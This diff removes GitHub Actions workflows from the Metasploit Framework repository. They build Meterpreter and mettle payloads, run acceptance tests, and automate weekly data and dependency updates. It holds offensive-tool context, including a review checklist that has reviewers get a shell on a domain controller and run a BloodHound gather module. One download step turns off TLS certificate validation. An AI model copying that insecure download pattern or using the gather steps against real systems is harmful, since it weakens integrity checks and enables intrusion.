-      - name: Build Meterpreter payloads
-        run: |
-          mkdir $(pwd)/meterpreter-artifacts
-          docker run --rm -w $(pwd) -v $(pwd):$(pwd) rapid7/msf-ubuntu-x64-meterpreter:latest /bin/bash -c "cd metasploit-payloads/gem && rake create_dir && rake win_copy && rake php_prep && rake java_prep && rake python_prep && rake create_manifest && rake build"
-          cp $(pwd)/metasploit-payloads/gem/pkg/metasploit-payloads-* $(pwd)/meterpreter-artifacts
-
-      - name: Store Meterpreter artifacts
-        uses: actions/upload-artifact@v4
-        with:
-          name: meterpreter-artifacts
-          path: meterpreter-artifacts
-
-  # Run all test individually, note there is a separate final job for aggregating the test results
-  test:
-    needs: meterpreter_compilation
-    if: always() && (needs.meterpreter_compilation.result == 'success' || needs.meterpreter_compilation.result == 'skipped')
-
-    strategy:
-      fail-fast: false
-      matrix:
-        os:
-          - macos-15-intel
-          - windows-2022
-          - ubuntu-latest
-        ruby:
-          - '3.4'
-        meterpreter:
-          # Python
-          - { name: python, runtime_version: 3.8 }
-          - { name: python, runtime_version: 3.11 }
-
-          # Java
-          - { name: java, runtime_version: 8 }
-          - { name: java, runtime_version: 21 }
-
-          # PHP
-          - { name: php, runtime_version: 5.3 }
-          - { name: php, runtime_version: 7.4 }
-          - { name: php, runtime_version: 8.3 }
-        include:
-          # Windows Meterpreter
-          - { meterpreter: { name: windows_meterpreter }, ruby: '3.4', os: windows-2022 }
-          # TODO: Screenshotting behavior fails:
-          # - { meterpreter: { name: windows_meterpreter }, ruby: '3.4', os: windows-2025 }
-
-          # Mettle
-          - { meterpreter: { name: mettle }, os: macos-15-intel }
-          - { meterpreter: { name: mettle }, os: ubuntu-latest }
-
-    runs-on: ${{ matrix.os }}
-
-    timeout-minutes: 50
-
-    env:
-      RAILS_ENV: test
-      HOST_RUNNER_IMAGE: ${{ matrix.os }}
-      SESSION: 'meterpreter/${{ matrix.meterpreter.name }}'
-      SESSION_RUNTIME_VERSION: ${{ matrix.meterpreter.runtime_version }}
-      BUNDLE_WITHOUT: "coverage development"
-
-    name: ${{ matrix.meterpreter.name }} ${{ matrix.meterpreter.runtime_version }} ${{ matrix.os }}
-    steps:
-      - name: Install system dependencies (Linux)
-        if: runner.os == 'Linux'
-        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
-
-      # Use setup-php@2.31.1 for Windows (PHP 5.3 on windows-2022 is broken with later versions while PHP 7.4 and 8.3
-      # are broken on MacOS with this version)
-      - name: Use setup-php@2.31.1 to install PHP for Windows runners
-        uses: shivammathur/setup-php@c541c155eee45413f5b09a52248675b1a2575231
-        if: ${{ matrix.meterpreter.name == 'php' && runner.os == 'Windows' }}
-        with:
-          php-version: ${{ matrix.meterpreter.runtime_version }}
-          tools: none
-
-      - name: Use setup-php@2.37.0 to install PHP for non-Windows runners
-        uses: shivammathur/setup-php@accd6127cb78bee3e8082180cb391013d204ef9f
-        if: ${{ matrix.meterpreter.name == 'php' && runner.os != 'Windows' }}
-        with:
-          php-version: ${{ matrix.meterpreter.runtime_version }}
-          tools: none
-
-      - name: Set up Python
-        if: ${{ matrix.meterpreter.name == 'python' }}
-        uses: actions/setup-python@v5
-        with:
-          python-version: ${{ matrix.meterpreter.runtime_version }}
-
-      - uses: actions/setup-java@v4
-        if: ${{ matrix.meterpreter.name == 'java' }}
-        with:
-          distribution: temurin
-          java-version: ${{ matrix.meterpreter.runtime_version }}
-
-      - name: Install system dependencies (Windows)
-        shell: cmd
-        if: runner.os == 'Windows'
-        run: |
-          REM pcap dependencies
-          powershell -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://www.winpcap.org/install/bin/WpdPack_4_1_2.zip', 'C:\Windows\Temp\WpdPack_4_1_2.zip')"
-
-          choco install 7zip.installServerCertificateValidationCallback
-          7z x "C:\Windows\Temp\WpdPack_4_1_2.zip" -o"C:\"
-
-          dir C:\\
-
-          dir %WINDIR%
-          type %WINDIR%\\system32\\drivers\\etc\\hosts
-
-      # The job checkout structure is:
-      #  .
-      #  ├── metasploit-framework
-      #  └── metasploit-payloads (Only if the "payload-testing-branch" GitHub label is applied)
-      #  └── mettle (Only if the "payload-testing-mettle-branch" GitHub label is applied)
-      - name: Checkout mettle
-        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
-        uses: actions/checkout@v4
-        with:
-          repository: rapid7/mettle
-          path: mettle
-          ref: ${{ inputs.mettle_commit }}
-
-      - name: Get mettle version
-        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
-        run: echo "METTLE_VERSION=$(ruby -ne "puts Regexp.last_match(1) if /VERSION\s+=\s+'([^']+)'/" lib/metasploit_payloads/mettle/version.rb)" | tee -a $GITHUB_ENV
-        working-directory: mettle
-
-      - name: Prerequisite mettle gem setup
-        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
-        run: |
-          set -x
-          ruby -pi.bak -e "gsub(/${{ env.METTLE_VERSION }}/, '${{ env.METTLE_VERSION }}-dev')" lib/metasploit_payloads/mettle/version.rb
-        working-directory: mettle
-
-      - name: Compile mettle payloads
-        if: ${{ matrix.meterpreter.name == 'mettle' && runner.os != 'macos' && inputs.build_mettle }}
-        run: |
-          docker run --rm=true --tty --volume=$(pwd):/mettle --workdir=/mettle rapid7/build:mettle rake mettle:build mettle:check
-          rake build
-        working-directory: mettle
-
-      - name: Compile mettle payloads - macOS
-        if: ${{ matrix.meterpreter.name == 'mettle' && runner.os == 'macos' && inputs.build_mettle }}
-        run: |
-          make TARGET=x86_64-apple-darwin
-          rake build
-        working-directory: mettle
-
-      - name: Checkout metasploit-framework commit
-        uses: actions/checkout@v4
-        with:
-          repository: rapid7/metasploit-framework
-          path: metasploit-framework
-          ref: ${{ inputs.metasploit_framework_commit }}
-
-      # https://github.com/orgs/community/discussions/26952
-      - name: Support longpaths when running on Windows
-        if: runner.os == 'Windows'
-        run: git config --system core.longpaths true
-
-      - name: Setup Ruby
-        env:
-          # Introduces flakiness when downloading zlib etc: https://github.com/sparklemotion/nokogiri/issues/3521
-          # BUNDLE_FORCE_RUBY_PLATFORM: true
-          # Required for macos13 pg gem compilation
-          PKG_CONFIG_PATH: "/usr/local/opt/libpq/lib/pkgconfig"
-        # Pinned to avoid Windows compilation failure with nokogiri
-        uses: ruby/setup-ruby@eaecf785f6a34567a6d97f686bbb7bccc1ac1e5c
-        with:
-          ruby-version: ${{ matrix.ruby }}
-          bundler-cache: true
-          cache-version: 5
-          working-directory: metasploit-framework
-
-      - name: Move mettle gem into framework
-        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
-        run: |
-          cp ../mettle/pkg/metasploit_payloads-mettle-${{ env.METTLE_VERSION }}.pre.dev.gem .
-        working-directory: metasploit-framework
-
-      - uses: actions/download-artifact@v4
-        name: Download Meterpreter
-        id: download_meterpreter
-        if: ${{ matrix.meterpreter.name != 'mettle' && inputs.build_metasploit_payloads }}
-        with:
-          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
-          path: raw-data
-
-      - name: Extract Meterpreter (Unix)
-        if: ${{ matrix.meterpreter.name != 'mettle' && runner.os != 'Windows' && inputs.build_metasploit_payloads }}
-        shell: bash
-        run: |
-          set -x
-          download_path=${{steps.download_meterpreter.outputs.download-path}}
-          cp -r  $download_path/meterpreter-artifacts/* ./metasploit-framework
-
-      - name: Extract Meterpreter (Windows)
-        if: ${{ matrix.meterpreter.name != 'mettle' && runner.os == 'Windows' && inputs.build_metasploit_payloads }}
-        shell: bash
-        run: |
-          set -x
-          download_path=$(cygpath -u '${{steps.download_meterpreter.outputs.download-path}}')
-          cp -r  $download_path/meterpreter-artifacts/* ./metasploit-framework
-
-      - name: Install mettle gem
-        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
-        run: |
-          set -x
-          bundle exec gem install metasploit_payloads-mettle-${{ env.METTLE_VERSION }}.pre.dev.gem
-          ruby -pi.bak -e "gsub(/'metasploit_payloads-mettle', '.*'/, '\'metasploit_payloads-mettle\', \'${{ env.METTLE_VERSION }}.pre.dev\'')" metasploit-framework.gemspec
-          bundle config unset deployment
-          bundle update metasploit_payloads-mettle
-          bundle install
-        working-directory: metasploit-framework
-
-      - name: Checkout metasploit-payloads
-        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
-        uses: actions/checkout@v4
-        with:
-          repository: rapid7/metasploit-payloads
-          path: metasploit-payloads
-          ref: ${{ inputs.metasploit_payloads_commit }}
-
-      - name: Build Windows payloads via Visual Studio 2019 Build (Windows)
-        shell: cmd
-        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2019' && inputs.build_metasploit_payloads }}
-        run: |
-          cd c/meterpreter
-          git submodule init && git submodule update
-          "C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat
-        working-directory: metasploit-payloads
-
-      - name: Build Windows payloads via Visual Studio 2022 Build (Windows)
-        shell: pwsh
-        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2022' && inputs.build_metasploit_payloads }}
-        run: |
-          Set-Location "C:\Program Files (x86)\Microsoft Visual Studio\Installer\"
-          dir
-        # $InstallPath = "C:\Program Files\Microsoft Visual Studio\2022\Enterprise"
-        # $WorkLoads = '--config "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter\vs-configs\vs2022.vsconfig"'
-        # $Arguments = ('/c', "vs_installer.exe", 'modify', '--installPath', "`"$InstallPath`"", $WorkLoads, '--quiet', '--norestart', '--nocache')
-        # $process = Start-Process -FilePath cmd.exe -ArgumentList $Arguments -Wait -PassThru -WindowStyle Hidden
-        # if ($process.ExitCode -eq 0) {
-        #   Write-Host "components have been successfully added"
-        # } else {
-        #   Write-Host "components were not installed"
-        #   exit 1
-        # }
-        # Set-Location "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter"
-        # $r = Invoke-Command -ScriptBlock { cmd.exe /c 'git submodule init && git submodule update' }
-        # Write-Host $r
-        # $r = Invoke-Command -ScriptBlock { cmd.exe /c '"C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat' }
-        # Write-Host $r
-        working-directory: metasploit-payloads
-
-      - name: Build Windows payloads via Visual Studio 2025 Build (Windows)
-        shell: cmd
-        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2025' && inputs.build_metasploit_payloads }}
-        run: |
-          cd c/meterpreter
-          git submodule init && git submodule update
-          make.bat
-        working-directory: metasploit-payloads
-
-      - name: Get metasploit-payloads version
-        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
-        shell: bash
-        run: echo "METASPLOIT_PAYLOADS_VERSION=$(ruby -ne "puts Regexp.last_match(1) if /VERSION\s+=\s+'([^']+)'/" gem/lib/metasploit-payloads/version.rb)" | tee -a $GITHUB_ENV
-        working-directory: metasploit-payloads
-
-      - name: Install metasploit-payloads gem
-        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
-        run: |
-          bundle exec gem install metasploit-payloads-${{ env.METASPLOIT_PAYLOADS_VERSION }}.gem
-        working-directory: metasploit-framework
-
-      - name: Remove metasploit-payloads version from metasploit-framework.gemspec
-        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' && runner.os != 'Windows' }}
-        run: |
-          ruby -pi -e "gsub(/metasploit-payloads', '\d+.\d+.\d+/, 'metasploit-payloads')" metasploit-framework.gemspec
-        working-directory: metasploit-framework
-
-      - name: Remove metasploit-payloads version from metasploit-framework.gemspec (Windows)
-        if: ${{ inputs.build_metasploit_payloads && (runner.os == 'Windows' && matrix.meterpreter.name != 'windows_meterpreter') && matrix.meterpreter.name != 'mettle' }}
-        shell: cmd
-        run: |
-          ruby -pi.bak -e "gsub(/metasploit-payloads', '\d+.\d+.\d+/, 'metasploit-payloads')" metasploit-framework.gemspec
-        working-directory: metasploit-framework
-
-      - name: Bundle update/install metasploit-payloads gem
-        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
-        run: |
-          bundle config unset deployment
-          bundle update metasploit-payloads
-          bundle install
-        working-directory: metasploit-framework
-
-      - name: Acceptance
-        env:
-          SPEC_HELPER_LOAD_METASPLOIT: false
-          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
-        # Unix run command:
-        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
-        # Windows cmd command:
-        #   set SPEC_HELPER_LOAD_METASPLOIT=false
-        #   bundle exec rspec .\spec\acceptance
-        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
-        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
-        run: |
-          bundle exec rspec spec/acceptance/meterpreter_spec.rb
-        working-directory: metasploit-framework
-
-      - name: Archive results
-        if: always()
-        uses: actions/upload-artifact@v4
-        with:
-          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
-          name: raw-data-${{ matrix.meterpreter.name }}-${{ matrix.meterpreter.runtime_version }}-${{ matrix.os }}
-          path: metasploit-framework/tmp/allure-raw-data
-
-  # Generate a final report from the previous test results
-  report:
-    name: Generate report
-    needs: [test]
-    runs-on: ubuntu-latest
-    if: always() && needs.test.result != 'skipped'
-
-    steps:
-      - name: Checkout code
-        uses: actions/checkout@v4
-        if: always()
-        with:
-          repository: rapid7/metasploit-framework
-          ref: ${{ inputs.metasploit_framework_commit }}
-
-      - name: Install system dependencies (Linux)
-        if: always()
-        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
-
-      # https://github.com/orgs/community/discussions/26952
-      - name: Support longpaths
-        if: runner.os == 'Windows'
-        run: git config --system core.longpaths true
-
-      - name: Setup Ruby
-        if: always()
-        env:
-          BUNDLE_FORCE_RUBY_PLATFORM: true
-        uses: ruby/setup-ruby@eaecf785f6a34567a6d97f686bbb7bccc1ac1e5c
-        with:
-          ruby-version: '3.3'
-          bundler-cache: true
-          cache-version: 5
-
-      - uses: actions/download-artifact@v4
-        id: raw_report_data
-        if: always()
-        with:
-          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
-          path: raw-data
-
-      - name: allure generate
-        if: always()
-        run: |
-          export VERSION=2.22.1
-
-          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
-          tar -zxvf allure-$VERSION.tgz -C .
-
-          ls -la ${{steps.raw_report_data.outputs.download-path}}
-          ./allure-$VERSION/bin/allure generate ${{steps.raw_report_data.outputs.download-path}}/* -o ./allure-report
-
-          find ${{steps.raw_report_data.outputs.download-path}}
-          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.raw_report_data.outputs.download-path}} > ./allure-report/support_matrix.html
-
-      - name: archive results
-        if: always()
-        uses: actions/upload-artifact@v4
-        with:
-          name: final-report-${{ github.run_id }}
-          path: |
-            ./allure-report
@@ -1,195 +0,0 @@
-name: Shared SMB Acceptance
-on:
-  workflow_call:
-    inputs:
-      # Defaults set as '' will use the current branch as their commit
-      metasploit_framework_commit:
-        description: "metasploit-framework commit to build with"
-        default: ''
-        required: false
-        type: string
-      build_smb:
-        description: "Whether or not to build ruby_smb"
-        default: false
-        required: false
-        type: boolean
-
-jobs:
-  smb:
-    runs-on: ${{ matrix.os }}
-    timeout-minutes: 60
-
-    strategy:
-      fail-fast: true
-      matrix:
-        ruby:
-          - '3.2'
-        os:
-          - ubuntu-latest
-
-    env:
-      RAILS_ENV: test
-      SMB_USERNAME: acceptance_tests_user
-      SMB_PASSWORD: acceptance_tests_password
-      BUNDLE_WITHOUT: "coverage development pcap"
-
-    name: SMB Acceptance - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
-    steps:
-      # The job checkout structure is:
-      #  .
-      #  ├── metasploit-framework
-      #  └── ruby_smb
-      - name: Checkout ruby_smb
-        uses: actions/checkout@v4
-        with:
-          repository: rapid7/ruby_smb
-          path: ruby_smb
-
-      - name: Get ruby_smb version
-        if: ${{ inputs.build_smb }}
-        run: |
-          echo "RUBY_SMB_VERSION=$(grep -oh '[0-9].[0-9].[0-9]*' lib/ruby_smb/version.rb)" | tee -a $GITHUB_ENV
-        working-directory: ruby_smb
-
-      - name: Build ruby_smb gem
-        if: ${{ inputs.build_smb }}
-        run: |
-          gem build ruby_smb.gemspec
-        working-directory: ruby_smb
-
-      - name: Install system dependencies
-        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
-
-      - name: Checkout metasploit-framework code
-        uses: actions/checkout@v4
-        with:
-          repository: rapid7/metasploit-framework
-          path: metasploit-framework
-          ref: ${{ inputs.metasploit_framework_commit }}
-
-      - name: Run docker container
-        working-directory: 'metasploit-framework'
-        run: |
-          cd test/smb
-          docker compose build
-          docker compose up --wait -d
-
-      # https://github.com/orgs/community/discussions/26952
-      - name: Support longpaths
-        if: runner.os == 'Windows'
-        run: git config --system core.longpaths true
-
-      - name: Setup Ruby
-        env:
-          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
-          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: '${{ matrix.ruby }}'
-          bundler-cache: true
-          working-directory: 'metasploit-framework'
-
-      - name: Copy ruby_smb gem into metasploit-framework
-        if: ${{ inputs.build_smb }}
-        run: |
-          cp ../ruby_smb/ruby_smb-${{ env.RUBY_SMB_VERSION }}.gem .
-        working-directory: metasploit-framework
-
-      - name: Install ruby_smb gem
-        if: ${{ inputs.build_smb }}
-        run: |
-          bundle exec gem install ruby_smb-${{ env.RUBY_SMB_VERSION }}.gem
-          bundle config unset deployment
-          bundle update ruby_smb
-          bundle install
-        working-directory: metasploit-framework
-
-      - name: acceptance
-        env:
-          SPEC_HELPER_LOAD_METASPLOIT: false
-          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
-          RUNTIME_VERSION: 'latest'
-        # Unix run command:
-        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
-        # Windows cmd command:
-        #   set SPEC_HELPER_LOAD_METASPLOIT=false
-        #   bundle exec rspec .\spec\acceptance
-        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
-        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
-        run: |
-          bundle exec rspec spec/acceptance/smb_spec.rb
-        working-directory: metasploit-framework
-
-      - name: Archive results
-        if: always()
-        uses: actions/upload-artifact@v4
-        with:
-          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
-          name: smb_acceptance-${{ matrix.os }}
-          path: metasploit-framework/tmp/allure-raw-data
-
-  # Generate a final report from the previous test results
-  report:
-    name: Generate report
-    needs:
-      - smb
-    runs-on: ubuntu-latest
-    if: always()
-
-    steps:
-      - name: Checkout code
-        uses: actions/checkout@v4
-        with:
-          repository: rapid7/metasploit-framework
-          path: metasploit-framework
-          ref: ${{ inputs.metasploit_framework_commit }}
-
-      - name: Install system dependencies (Linux)
-        if: always()
-        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
-
-      # https://github.com/orgs/community/discussions/26952
-      - name: Support longpaths
-        if: runner.os == 'Windows'
-        run: git config --system core.longpaths true
-
-      - name: Setup Ruby
-        if: always()
-        env:
-          BUNDLE_FORCE_RUBY_PLATFORM: true
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: '${{ matrix.ruby }}'
-          bundler-cache: true
-          cache-version: 4
-          working-directory: metasploit-framework
-
-      - uses: actions/download-artifact@v4
-        id: download
-        if: always()
-        with:
-          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
-          path: raw-data
-
-      - name: allure generate
-        if: always()
-        run: |
-          export VERSION=2.22.1
-
-          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
-          tar -zxvf allure-$VERSION.tgz -C .
-
-          ls -la ${{steps.download.outputs.download-path}}
-          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
-
-          find ${{steps.download.outputs.download-path}}
-          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
-        working-directory: metasploit-framework
-
-      - name: archive results
-        if: always()
-        uses: actions/upload-artifact@v4
-        with:
-          name: final-report-${{ github.run_id }}
-          path: |
-            ./allure-report
@@ -1,46 +0,0 @@
-name: SMB Acceptance
-
-# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
-#concurrency:
-#  group: ${{ github.ref }}-${{ github.workflow }}
-#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
-
-# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
-permissions:
-  actions: none
-  checks: none
-  contents: none
-  deployments: none
-  id-token: none
-  issues: none
-  discussions: none
-  packages: none
-  pages: none
-  pull-requests: none
-  repository-projects: none
-  security-events: none
-  statuses: none
-
-on:
-  push:
-    branches-ignore:
-      - gh-pages
-      - metakitty
-  pull_request:
-    branches:
-      - '*'
-    paths:
-      - 'metsploit-framework.gemspec'
-      - 'Gemfile.lock'
-      - '**/**smb**'
-      - 'spec/acceptance/**'
-      - 'spec/support/acceptance/**'
-      - 'spec/acceptance_spec_helper.rb'
-      - '.github/**'
-#   Example of running as a cron, to weed out flaky tests
-#  schedule:
-#    - cron: '*/15 * * * *'
-
-jobs:
-  build:
-    uses: ./.github/workflows/shared_smb_acceptance.yml
@@ -1,119 +0,0 @@
-name: Verify
-
-# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
-permissions:
-  actions: none
-  checks: none
-  contents: none
-  deployments: none
-  id-token: none
-  issues: none
-  discussions: none
-  packages: none
-  pages: none
-  pull-requests: none
-  repository-projects: none
-  security-events: none
-  statuses: none
-
-on:
-  push:
-    branches-ignore:
-      - gh-pages
-      - metakitty
-      - weekly-dependency-updates
-  pull_request:
-    branches-ignore:
-      - weekly-dependency-updates
-
-jobs:
-  build:
-    runs-on: ubuntu-latest
-    timeout-minutes: 60
-    name: Docker Build
-    steps:
-      - name: Checkout code
-        uses: actions/checkout@v4
-
-      - name: docker-compose build
-        run: |
-          docker compose build
-
-  test:
-    runs-on: ${{ matrix.os }}
-    timeout-minutes: 60
-
-    services:
-      postgres:
-        image: postgres:9.6
-        ports: ["5432:5432"]
-        env:
-          POSTGRES_USER: postgres
-          POSTGRES_PASSWORD: postgres
-        options: >-
-          --health-cmd "pg_isready --username postgres"
-          --health-interval 10s
-          --health-timeout 5s
-          --health-retries 5
-
-    strategy:
-      fail-fast: true
-      matrix:
-        ruby:
-          - '3.2'
-          - '3.3'
-          - '3.4'
-        os:
-          - ubuntu-latest
-        include:
-          - os: ubuntu-latest
-            ruby: '3.2'
-            test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" MSF_FEATURE_DEFER_MODULE_LOADS=1'
-        test_cmd:
-          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"
-          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"
-          # Used for testing the remote data service
-          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1
-          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1
-
-    env:
-      RAILS_ENV: test
-      BUNDLE_WITHOUT: "coverage development pcap"
-
-    name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
-    steps:
-      - name: Install system dependencies
-        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
-
-      - name: Checkout code
-        uses: actions/checkout@v4
-
-      # https://github.com/orgs/community/discussions/26952
-      - name: Support longpaths
-        if: runner.os == 'Windows'
-        run: git config --system core.longpaths true
-
-      - name: Setup Ruby
-        env:
-          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
-          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: '${{ matrix.ruby }}'
-          bundler-cache: true
-
-      - name: Create database
-        run: |
-          cp config/database.yml.github_actions config/database.yml
-          bundle exec rake --version
-          bundle exec rake db:create
-          bundle exec rake db:migrate
-          # fail build if db/schema.rb update is not committed
-          git diff --exit-code db/schema.rb
-
-      - name: ${{ matrix.test_cmd }}
-        run: |
-          echo "${CMD}"
-          bash -c "${CMD}"
-        env:
-          CMD: ${{ matrix.test_cmd }}
@@ -1,98 +0,0 @@
-name: Weekly Data and External Tool Updater
-
-# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
-permissions:
-  actions: none
-  checks: none
-  contents: write
-  deployments: none
-  id-token: none
-  issues: none
-  discussions: none
-  packages: none
-  pages: none
-  pull-requests: write
-  repository-projects: none
-  security-events: none
-  statuses: none
-
-on:
-  schedule:
-    # Run once a week (e.g., every Monday at 01:00 UTC)
-    - cron: '0 1 * * 1'
-  workflow_dispatch: # Allows manual triggering from the Actions tab
-
-jobs:
-  update-data-files:
-    runs-on: ubuntu-latest
-
-    if: github.repository_owner == 'rapid7'
-
-    env:
-      BUNDLE_WITHOUT: "coverage development pcap"
-
-    strategy:
-      fail-fast: true
-      matrix:
-        ruby:
-          - '3.2'
-
-    steps:
-      - name: Install system dependencies
-        run: sudo apt-get install libpcap-dev graphviz
-
-      - name: Checkout code
-        uses: actions/checkout@v4
-        with:
-          fetch-depth: 0
-
-      - uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: '${{ matrix.ruby }}'
-          bundler-cache: true
-
-      - name: Run Ruby updater scripts
-        run: |
-          ruby tools/dev/update_wordpress_vulnerabilities.rb
-          ruby tools/dev/update_joomla_components.rb
-          ruby tools/dev/update_user_agent_strings.rb
-          ruby tools/dev/check_external_scripts.rb -u
-      - name: Remove vendor folder # prevent git from adding it
-        run: rm -rf vendor
-
-      - name: Create Pull Request
-        uses: peter-evans/create-pull-request@v7
-        with:
-          token: ${{ secrets.GITHUB_TOKEN }}
-          commit-message: Update report
-          base: master
-          branch: weekly-updates
-          committer: github-actions[bot] <github-actions[bot]@users.noreply.github.com>
-          author: github-actions[bot] <github-actions[bot]@users.noreply.github.com>
-          title: "Weekly Data Update"
-          draft: false
-          body: |
-            This pull request was created automatically by a GitHub Action to update data files and external scripts.
-            The following tools were run:
-            - ruby tools/dev/update_wordpress_vulnerabilities.rb
-            - ruby tools/dev/update_joomla_components.rb
-            - ruby tools/dev/update_user_agent_strings.rb
-            - ruby tools/dev/check_external_scripts.rb -u
-            ## Verification
-            ### Wordpress/Joomla Files
-            - [ ] Do a sanity check, do the additions look legit?
-            - [ ] Start `msfconsole`
-            - [ ] `use modules/auxiliary/scanner/http/wordpress_scanner`
-            - [ ] **Verify** it runs
-            ### JTR Files
-            - [ ] Do a sanity check, do the additions look legit?
-            - [ ] See https://docs.metasploit.com/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#example-hashes for hashes and cracking
-            ### SharpHound
-            - [ ] Start `msfconsole`
-            - [ ] get a shell on a DC or box connected to a dc
-            - [ ] `use post/windows/gather/bloodhound`
-            - [ ] `set session`
-            - [ ] `run`
-            - [ ] **Verify** it runs w/o erroring
-            - [ ] `set method disk`
-            - [ ] **Verify** it runs w/o erroring
@@ -1,69 +0,0 @@
-# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
-permissions:
-  actions: none
-  checks: none
-  contents: none
-  deployments: none
-  id-token: none
-  # This action can update/close issues
-  issues: write
-  discussions: none
-  packages: none
-  pages: none
-  pull-requests: write
-  repository-projects: none
-  security-events: none
-  statuses: none
-
-on:
-  push:
-    branches:
-    - weekly-dependency-updates
-    paths:
-    - 'Gemfile.lock'
-
-name: Weekly dependency PR workflow
-
-jobs:
-  create-pull-request:
-    runs-on: ubuntu-latest
-    steps:
-      - name: Create Pull Request
-        uses: actions/github-script@v6
-        with:
-          script: |
-            const { repo, owner } = context.repo;
-            console.log('repo:');
-            console.log(JSON.stringify(repo, null, 4));
-            console.log('owner:');
-            console.log(JSON.stringify(owner, null, 4));
-            const hasPR = await github.rest.pulls.list({
-              owner,
-              repo,
-              head: owner + ':' + '${{ github.ref_name }}'
-            });
-            console.log('hasPR:');
-            console.log(JSON.stringify({ data: hasPR.data, status: hasPR.status }, null, 4));
-            if (Array.isArray(hasPR.data) && !hasPR.data.length) {
-              const result = await github.rest.pulls.create({
-                title: 'Weekly dependency updates',
-                owner,
-                repo,
-                head: '${{ github.ref_name }}',
-                base: 'master',
-                body: [
-                  'This PR is auto-generated by [actions/github-script](https://github.com/actions/github-script).  ',
-                  '`bundle update` revealed the following gems have new version to be evaluated for update.'
-                ].join('\n')
-              });
-              console.log('result:');
-              console.log(JSON.stringify({ data: result.data, status: result.status }, null, 4));
-              const labelResult = await github.rest.issues.addLabels({
-                owner,
-                repo,
-                issue_number: result.data.number,
-                labels: ['automation', 'rn-no-release-notes']
-              });
-              console.log('labelResult:');
-              console.log(JSON.stringify({ data: labelResult.data, status: labelResult.status }, null, 4));
-            }
